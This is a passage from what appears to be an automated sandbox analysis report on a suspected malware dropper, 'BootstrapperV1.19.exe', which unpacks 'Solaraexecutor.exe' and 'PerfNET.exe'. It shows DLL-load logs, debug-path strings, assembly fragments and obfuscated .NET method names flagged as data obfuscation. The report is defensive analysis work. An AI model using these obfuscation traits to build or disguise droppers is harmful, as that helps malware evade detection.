                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: BootstrapperV1.19.exeStatic file information: File size 3247616 > 1048576
                                    Source: BootstrapperV1.19.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x316c00
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: BootstrapperV1.19.exe
                                    Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Xml.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.pdb` source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Configuration.pdb[ source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: \??\C:\Windows\System.pdbX source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE455000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.Configuration.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: em.pdb3s[ source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.Configuration.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.ni.pdbRSDSC source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.PDB4y source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.Xml.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.pdb source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp, WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Core.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.pdbH source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: mscorlib.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: mscorlib.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Core.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Runtime.Serialization.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Runtime.Serialization.pdbMZ source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Core.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr

                                    Data Obfuscation

                                    barindex
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs.Net Code: Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777245)),Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777259))})
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs.Net Code: Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777245)),Type.GetTypeFromHandle(F8SYxHahRixSE2oaV7u.KZawcGAkkkc(16777259))})
                                    Source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                                    Source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeFile created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\__tmp_rar_sfx_access_check_4335062Jump to behavior
                                    Source: Solaraexecutor.exe.0.drStatic PE information: section name: .didat
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B8060F6 push esp; ret 1_2_00007FFD9B806139
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B805909 push edx; retf 1_2_00007FFD9B8059DB
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B805948 push edx; retf 1_2_00007FFD9B8059DB
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B8046D8 push esp; retf 1_2_00007FFD9B8046D9
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeCode function: 1_2_00007FFD9B801ED0 push esp; ret 1_2_00007FFD9B806139
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3F640 push ecx; ret 3_2_00D3F653
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3EB78 push eax; ret 3_2_00D3EB96
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BAB5367 push eax; ret 13_2_00007FFD9BAB5373
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BAB3BBE push ds; retf 13_2_00007FFD9BAB3BBF
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BC124D1 push ebx; retf 13_2_00007FFD9BC124D2
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BC120D2 push edx; iretd 13_2_00007FFD9BC120D3
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAE352 push edx; ret 13_2_00007FFD9BEAE35F
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEA62C5 push ebp; ret 13_2_00007FFD9BEA62C8
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAE194 push edx; ret 13_2_00007FFD9BEAE1A4
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAD957 pushad ; ret 13_2_00007FFD9BEAD958
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEADF6C push esp; ret 13_2_00007FFD9BEADF79
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAE5B0 push esp; ret 13_2_00007FFD9BEAE5B1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAE527 push eax; ret 13_2_00007FFD9BEAE52E
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAD500 pushad ; ret 13_2_00007FFD9BEAD501
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeCode function: 13_2_00007FFD9BEAE470 push ecx; ret 13_2_00007FFD9BEAE474
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, bFs94RCKTmRTLfvTG3K.csHigh entropy of concatenated method names: 'syOdlHiKwqQ', 'iOxCBNnObh', 'JnnCUeJaSJ', 'dfgCWKg0c8', 'TsO1gUdD3VKcAhIXq43N', 'd1BroZdDmCrkfjQFKOhZ', 'z3t6NWdDCVpS46eU18yT', 'BQufhadDVjKA6wjDOMqO', 'iLwxgTdD5dWCpswqqwlU', 'S0rZJodDEh5guqVAL4Sc'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Ms4tXKtiAVq9fuUYxX.csHigh entropy of concatenated method names: 'eMesUxePU', 'T1V4rLd80BcJcysQZZiB', 'tFlb8Kd8Yda0KlG8tdlo', 'OlCLRKd8T7H89xmfRNih', 'uUSRkVf9Q', 'YN7j7hhgy', 'boyykytcM', 'cCZIRkKJW', 'PQFpJ3oV7', 'A4ueTIuOy'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, sgLoBqGshEXy1Bx3cN7.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'SsadJPFdr5t', 'hVJG3q8Gjw', 'imethod_0', 'xWfXlTdTA7PIgH4SjcLq', 'QDcaTrdTKaunC9s3pYiK', 'El1RvydTOWAH7r0tidBN', 'UEEEtfdTB5eyUrHAwpnl'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, zpB7r3YxvuslBboFAc8.csHigh entropy of concatenated method names: 'OCJTiv9xyD', 'diUTdhO81g', 'Yd7', 'ndwTwZH6n1', 'iTGT2vc48L', 'mdCTJUAXps', 'O7aTGBIYxa', 'Neu9pidrdLn5dd9voMGs', 'AJ8V8qdWzPrKb8TtGZai', 'LQkjmvdriliDl049AgLb'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, eP5Gv2cHImrxAnL3beH.csHigh entropy of concatenated method names: 'CZxcTJlFY1', 'IboL1ud0ExiHTkZfMfay', 'riwKxRd0VCXfLg9P9Qxl', 'VwwuFKd05DoVWbrJ2mYD', 'lJQifxd09c8c3THJcsyC', 'b9B97Jd0APVVYbVTTcIv', 'E94', 'P9X', 'vmethod_0', 'JNIdJjKHMW8'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, eZAYLEG63BEuMY8eQfC.csHigh entropy of concatenated method names: 'l6uGgbYjsy', 'is2G7o7USQ', 'Ld7GZpvV9l', 'vHZvxEdT59W2tCQ8lqfY', 'gjXdN7dTEoS2ewTg0LFs', 'CIgbKidTCj9E0sLS0K0J', 'jSuTjZdTVqbyODnImhlO', 'HJnGeKTyC1', 'HiTGHomcfl', 'AJ0XA6dT31RP2sFKPokZ'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, K3vnDkkRZna5ntOkLOT.csHigh entropy of concatenated method names: 'Xkpk7IZlEw', 'IryYl9d4EFaCidN1ppfs', 'L4xLcnd49VAqwKb75IrJ', 'kHw34Wd4VeM6X8TptOEG', 'AtHAWVd45RGxwiH90bdK', 'dpmgJXd4AeKJRGyErOq2', 'U4fUr0d4KmfS4NXTICJk', 'M8BkyCjQYw', 'VpKkISVVaD', 'fiNkpYqtgc'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, SiHSKVFplvOFL7lSn7L.csHigh entropy of concatenated method names: 'RgpRvo39yP', 'QtTRhbLFlr', 'C4Wpv1dVD3PRr5yMO6TA', 'FND8uKdVoLElyRHeVNn7', 'LoqhRxdV1G9GdhcNswIB', 'PY2xY6dVLayQwYwEG0bl', 'C25XcfdVNikpGwq3Pyff', 'dIWRREhF3T', 'lgTXM0dVxPgjOFKZrbmw', 'FeVhaodVQQNmHeN4ixa0'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Iyf8nVlIVwjNu2TmlXo.csHigh entropy of concatenated method names: 'gGIlesATqH', 'PH1rfCdsVsfj5F5tRdBp', 'mEGcE8ds5G0PWjrYKshH', 'oMEBBhdsERlTag97Se0C', 'F4OFCYds9nFZEeSGwb2m', 'yPhNApdsAFCQu3NWQbSf', 'ocqO7Wdsmjxx9SKnVT90', 'S0GpLLdsCycKp5wrRkaM', 'wJoZUjdsKPvnGQUJBmS6'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, XZnPSqdhCwxGeOaoYyA.csHigh entropy of concatenated method names: 'NuGd6UVgKD', 'zoFdbW5Nks', 'D2gdtTcvlG', 'tkb9dwdgu0M3P8FPtu7D', 'rJPMAYdgR16AbGC22qEe', 'wuWBX5dgjSCXD9V5vAsc', 'Ns2gcrdgyHNHLIxHIo9j', 'a473SUdgI8KA3DbBZx3S'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, wUwAQUGoZtL37YjvxI3.csHigh entropy of concatenated method names: 'e93GQOl3pd', 'YEfGaIJk6B', 'PbPGxu34lh', 'HI6GzDCC2Q', 'R4gciQJo4Q', 'EhScdegriD', 'feHcwTLGES', 'FREhSod06ALPoNJZmsrT', 'zBChvkd0bjNf2Per2FuM', 'siP5a1d0hsliDjG4TA1P'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, ByL6IQVXXZrh0SceR8N.csHigh entropy of concatenated method names: 'IH4Va7EDwy', 'wCxVxC7wsj', 'MBpVzCjth6', 'VEv5iHJUwP', 'NJq5dmATvi', 'WcS5wHSc6m', 'Ngw52OBmPO', 'g7O5JEHSrw', 'gSl5GLncfZ', 'uh25cc8wSj'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, pEpn0Uydwuhg28FHsex.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'oUDdlR3B7db', 'geLdlj3uASA', 'yTLPOndEOpow0M6lSsVC', 'fAqiHedEBAagGMZdH7RW', 'jr6wvkdEUKJRivyYwj3J', 'oSshgddEW9oaLF5paVgU', 'BhIPRsdErx3NK2LY2ncW', 'TL57P6dEoqRJfUUJtms1'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, orrItn7OSYL3BKHpDGE.csHigh entropy of concatenated method names: 'akM7UgEIIF', 'rwm7WFDu03', 'VhV7rNKsDX', 'tQx7yjdBBEgu4k2eMm0q', 'fC8x8hdBKGqyfuOHXUUH', 'xt2TuYdBOgXiHUJt8sZI', 'bsgIYRdBUVC7oITpQ1tJ', 'c39EixdBW0d8DdRbUWnx', 'MdIao8dBr7pftZ5dq2uv', 'e4VDGTdBo3CdDM8b3xGt'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, FYX4aOlGSdRD5CQq1v7.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'C61dJSpTZUK', 'vmethod_0', 'imethod_0', 't6ZXqydsF124HgiQFa0x', 'XNXRrGdsvmU8Oi53cOt2', 'VnKuRxdsh1o30f94APJr', 'JoTnQPds6dvShYEAd9kf', 'YQskXKdsb4SrgvwvBa5Y'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, aydgOIZ5uyteP8hL0rI.csHigh entropy of concatenated method names: 'DeCZ91ePSp', 'ymbZAbfiGu', 'kAGZK22Cf5', 'uYYZOPF4GK', 'd8sZBYpTbh', 'oSKZUBVjf7', 'JmaZWSE7B2', 'sAVZrbOGiE', 'u5qZogqE1l', 'uISZ15FqsL'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EfXDmijhlMXXi1yjthp.csHigh entropy of concatenated method names: 'pAJjjivhCs', 'FgKeV3d5xWA4OU3nKlsI', 'm9Ac6wd5zU8Mp5kveJKH', 'RxWQEAd5QYtx3V5kBmGH', 'dwtq9rd5aDw6dXn84Wpv', 'fyY8ajdEi2ZWCxIq9fIH', 'CVMj6UYp9Z', 'Se2rH8d5oM4AdGC5mNq8', 'cdHVdAd51nYPcnlBTH02', 'OOZOSFd5Dk6x7Pvrkdsy'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, loak9tDTx8UxwNx0SXy.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'MrbD4rjaBC', 'W1BqZbdNDJjOR88mGVQV', 'DQIIXjdNLJL0Ko7qwjab', 'NTdKtPdNN8Geuahw8vtM', 'QXrUrPdNXM0uLAX0tgVS', 'jApUCLdNQLlgbXg5LdoJ', 'T2861ZdNaAsZhN56VnpW'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, yV4CUEeoo52WkeWC1ZZ.csHigh entropy of concatenated method names: 'uuXeDMOVIU', 'uVoeLgHtaQ', 'sGmeNW655E', 'fyPeXavRIR', 'JIGeQ01Owk', 'RKpv58dANDtwPc6QkTR1', 'msRAsXdAXny0CueOdN3C', 'JUUjkWdAQ2kdCl2yTBl6', 'XcROWRdAavJLM4v6ZE3H', 'VUI8YWdAxqhC48bnXneK'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, eTPltgCT8NS7aqQrvfj.csHigh entropy of concatenated method names: 'NlrC4k7Yin', 'ABaCsapj7L', 'PObCnSpy0F', 'ypoC3xgL6J', 'zteCmbm91o', 'fHZCC8tJ3C', 'yV3CVvMJSM', 'gcjC57N3hx', 'kOPCEL2pnN', 'bslC9ysoEj'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EbEKDRZTNxx4QvphlqR.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, NyHUmVjA6wwfYZYxlpK.csHigh entropy of concatenated method names: 'TagjO4edcT', 'Lc8jBJmKTe', 'abljUk95ur', 'jjYBDqdESBQOD9YODiWX', 'FG5T7jdEekZas5JLIXMC', 'xanyiOdEHLGabC255Tgq', 'sZhpiAdE8dqPeTMOY8PV', 'sUmLjndEgqZK6oAK7piU', 'TkXUBMdE7MwmbWtvk1xi'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, hR3CLFzffFD3QIInCq.csHigh entropy of concatenated method names: 'j8XddAqBwe', 'NNud2I7Vhq', 'a25dJy7S94', 'DlldGGVCGl', 'FjwdcrPLG3', 'OdndkKNB7O', 'gHudMN9oLn', 'bZ7dgmdgMDVmLcI5lA2C', 'lrONiKdgfrIka86ZRZjF', 'xA7PZjdgPrx7hpCcHwgU'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, FEaxvtRDwjTdbLI3Wqn.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'jRBdlvGUv4y', 'MNtdJONXRvO', 'F3Puued5ZkHYeNFirym9', 'x8imbpd5YPMtRksKgYqp', 'lON3vmd5TqnPlvH6yVSK', 'Mwb6VOd50P8D7o7OFvNl', 'fM8EGed54XSd1VpKkGxf'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, jf1scMRCdWpEXADMYhS.csHigh entropy of concatenated method names: 'EaKROkdaRI', 'ImuRBeNqsa', 'GstRU55txo', 'vV6VfDd5yi4L07AxEf4g', 'jZPLyjd5R1EdNVEZUPki', 'oIwVGMd5jkiTiCy7E8gi', 'T0yR5h7Qay', 'OuoRE2rf3V', 'KraR9Ax2iu', 'xci2YNd5bYGRcEs44eAE'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Er4GOj2rNOLEknahGv8.csHigh entropy of concatenated method names: 'nD2J2hHck3', 'Fm6JJ4pMUU', 'akFJGO3bgX', 'vqw1lVdYMSx1DqTom8jV', 'kG4AbxdYkfM3aoVGjvBG', 'RjWfHldYl8NryPq9N3wx', 'lsbvwJdYfCuK36aQApp3', 'pS3JPbQrj4', 'wP1MhpdYqeF0w4QLs7CR', 'ESG1CidYvnsAvy0BrYDy'
                                    Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, YyUFRcgEUIxexsDWZSj.csHigh entropy of concatenated method names: 'YWOgaeB02B', 'fd3gzbnG1a', 'rTBgA1OriZ', 'dM0gKlBkuV', 'FklgOeLJW6', 's2HgBs6Qru', 'lPDgUc64vp', 'c05gWUEvGW', 'MDDgrBwwAd', 'Xj7go5mkYv'
